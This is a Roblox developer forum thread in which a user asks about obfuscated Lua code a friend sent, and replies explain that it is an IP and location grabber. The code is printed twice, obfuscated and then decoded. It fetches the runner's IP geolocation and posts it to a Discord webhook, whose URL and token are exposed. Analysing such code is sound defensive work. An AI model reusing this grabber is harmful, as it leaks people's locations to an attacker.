Help understanding malicious attempt to get my location

Help and Feedback Scripting Support
#1

Hey there, I’m very unexperienced in anything scripting related that’s external from roblox, my friend sent me an rbxm with this code and i wanted to make sure it doesn’t actually work. Could anybody give me a basic understanding of what this code does?

local n = game:GetService(“\x48\x74\x74\x70\x53\x65\x72\x76\x69\x63\x65”)
local j = “https://discord.com/api/webhooks/1272370779849228339/Fq1YPo2VWSULOqEuP1xH9-wNt0Yu7daMA3NI4dwJCbUYdcxibC2NZ9r_QjVX3NzuVcuG
local _ = “\x68\x74\x74\x70\x3A\x2F\x2F\x69\x70\x2D\x61\x70\x69\x2E\x63\x6F\x6D\x2F\x6A\x73\x6F\x6E”
local _ = n:GetAsync()
local g = n:JSONDecode()
local m = script.Parent.Name
local l = m…“\x27\x73\x20\x49\x6E\x66\x6F\x72\x6D\x61\x74\x69\x6F\x6E\x3A\n”
local i = “\n\x43\x6F\x75\x6E\x74\x72\x79\x3A\x20”…g.country
local k = “\n\x52\x65\x67\x69\x6F\x6E\x20\x26\x20\x52\x65\x67\x69\x6F\x6E\x20\x4E\x61\x6D\x65\x3A\x20”…g.region…“\x2C\x20”…g.regionName
local h = “\n\x43\x69\x74\x79\x3A\x20”…g.city
local b = “\n\x5A\x69\x70\x43\x6F\x64\x65\x3A\x20”…g.zip
local a = “\n\x4C\x61\x74\x69\x74\x75\x64\x65\x3A\x20”…g.lat
local _ = “\n\x4C\x6F\x6E\x67\x69\x74\x75\x64\x65\x3A\x20”…g.lon
local c = “\n\x54\x69\x6D\x65\x20\x5A\x6F\x6E\x65\x3A\x20”…g.timezone
local e = “\n\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x53\x65\x72\x76\x69\x63\x65\x20\x50\x72\x6F\x76\x69\x64\x65\x72\x3A\x20”…g.isp
local d = “\n\x4F\x72\x67\x61\x6E\x69\x7A\x61\x74\x69\x6F\x6E\x3A\x20”…g.org
local f = “\n\x41\x2F\x53\x3A\x20”…g.as
local g = “\n\x51\x75\x65\x72\x79\x20\x28\x49\x50\x29\x3A\x20”…g.query
local _ = {
[“\x65\x6D\x62\x65\x64\x73”] = {
{
[“\x74\x69\x74\x6C\x65”] = “\x2A\x2A”…m…“\x2A\x2A”,
[“\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E”] = l…i…k…h…b…a……c…e…d…f…g,
[“\x74\x79\x70\x65”] = “\x72\x69\x63\x68”,
[“\x63\x6F\x6C\x6F\x72”] = tonumber(3066993)
}
}
}
n:PostAsync(j, n:JSONEncode())

1 Like
#2

idrk if that works or not, but you did just leak the webhook lol

#3

it sends a get request to http://ip-api.com/json and just sends all information from that api to a discord webhook

local L_1_ = game:GetService("HttpService")
local L_2_ = "https://discord.com/api/webhooks/1272370779849228339/Fq1YPo2VWSULOqEuP1xH9-wNt0Yu7daMA3NI4dwJCbUYdcxibC2NZ9r_QjVX3NzuVcuG"
local L_3_ = "http://ip-api.com/json"
local L_4_ = L_1_:GetAsync()
local L_5_ = L_1_:JSONDecode()
local L_6_ = script.Parent.Name;
local L_7_ = L_6_ .. "'s Information:"
local L_8_ = "Country: " .. L_5_.country;
local L_9_ = "Region & Region Name: " .. L_5_.region .. ", " .. L_5_.regionName;
local L_10_ = "City: " .. L_5_.city;
local L_11_ = "ZipCode: " .. L_5_.zip;
local L_12_ = "Latitude: " .. L_5_.lat;
local L_13_ = "Longitude: " .. L_5_.lon;
local L_14_ = "Time Zone: " .. L_5_.timezone;
local L_15_ = "Internet Service Provider: " .. L_5_.isp;
local L_16_ = "Organization: " .. L_5_.org;
local L_17_ = "A/S: " .. L_5_.as;
local L_18_ = "Query (IP): " .. L_5_.query;
local L_19_ = {
	["embeds"] = {
		{
			["title"] = "**" .. L_6_ .. "**",
			["description"] = L_7_ .. L_8_ .. L_9_ .. L_10_ .. L_11_ .. L_12_ .. L_14_ .. L_15_ .. L_16_ .. L_17_ .. L_18_,
			["type"] = "rich",
			["color"] = tonumber(3066993)
		}
	}
}
L_1_:PostAsync(L_2_, L_1_:JSONEncode())
2 Likes
#4

Read up on ASCII

Basically it’s just using an escape character (\x) and then they’re adding the hexadecimal value of a character (letter)

So it eventually ends up forming variables etc

For example:

\x65 = e

(65 represents the letter e in hexadecimal form)

But you wouldn’t even need to do any sort of decoding because they flat out have “PostAsync” at the end which should tell you what’s going on

And all of this stuff just uses an API to get a whole bunch of location stuff off of you to send to them

You should ask them if they’ve ran the code yet to make sure they’re safe

1 Like
#5

just seems like a simple ip grabber that sends information to a webhook, if you want you can just spam the webhook and it’ll eventually ban itself

#6

Unless Roblox blocks some features of HTTPs requests, that should work.

HTTPs requests require IP addresses. If the HTTPs request is sent from the client (which can probably only be done in studio), the HTTPs contains information about the IP address and therefore the location of the sender (without a VPN).

Generally don’t run any obfuscated code (which is what all the L_15 stuff is). People who hide what their code does rarely have good intentions.

#7

or just do this

image
image961×43 6.37 KB

2 Likes
#8

plus you should be fine, the webhook isn’t even active anymore

#9

im the one who ran it :skull: appreciate the help though, just hope they wont do anything bad with it… i need to educate myself further on whats possible on roblox :sob: rlly appreciate it tho

2 Likes
#10

I actually clicked on the webhook after i ran the game and it was active, it had lots more information but then i refreshed and it all disapeared…

#11

If the web hook was still up when you executed the code uhhh ion know if you’re in trouble or not

1 Like
#12

i’m 99% sure they got the information which sucks dude, i just need to hope they dont have any malicious intent… they said they were just testing if it works on me, but im still very skepticle

1 Like
#13

This topic was automatically closed 14 days after the last reply. New replies are no longer allowed.